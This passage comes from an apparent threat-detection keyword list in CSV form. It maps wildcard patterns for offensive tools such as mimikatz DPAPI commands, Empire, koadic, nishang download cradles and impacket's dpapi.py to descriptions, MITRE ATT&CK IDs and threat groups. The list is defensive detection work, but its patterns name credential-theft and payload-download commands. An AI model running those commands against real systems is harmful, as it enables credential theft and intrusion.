C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*DotNet2JSImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*DotNetArtifactGenerator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*DoubleAgent.sln*,offensive_tool_keyword,DoubleAgent,DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. 
the attackers DLL would still be injected every time the process executes.,T1055 - T1059 - T1053,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Cybellum/DoubleAgent,1,1,N/A,N/A,10,1200,436,2022-08-24T10:32:36Z,2017-03-12T17:05:57Z -*douknowwhoami?d*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,0,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*download *bloodhound*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*download *Roaming\mRemoteNG\confCons.xml*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*download /etc/passwd*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Download:Cradle.js*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*Download_Cradles.*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*Download_Execute*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*DownloadAndExtractFromRemoteRegistry*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*DownloadAndExtractFromRemoteRegistry*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Download-Cradles.cmd*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*Download-Execute-PS*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*DownloadFileImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Downloading */*.tar to /tmp/*.pak*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,0,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*downloadMalwareDomains*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names 
,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*downloads/wapiti-code*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*DownloadString*https://checkip.amazonaws.com*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,0,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*dpapi.py backupkeys -t */*@*,greyware_tool_keyword,dpapi.py,the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. gaining unauthorized access to other systems and resources.,T1552.006,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*dpapi.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dpapi/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*dpapi::blob*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cache*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::capi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::chrome*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cloudapkd*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cloudapreg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cng*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::create*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cred*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::credhist*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::luna*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::masterkey*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::protect*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::ps*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::rdg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::sccm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::ssh*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::tpm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
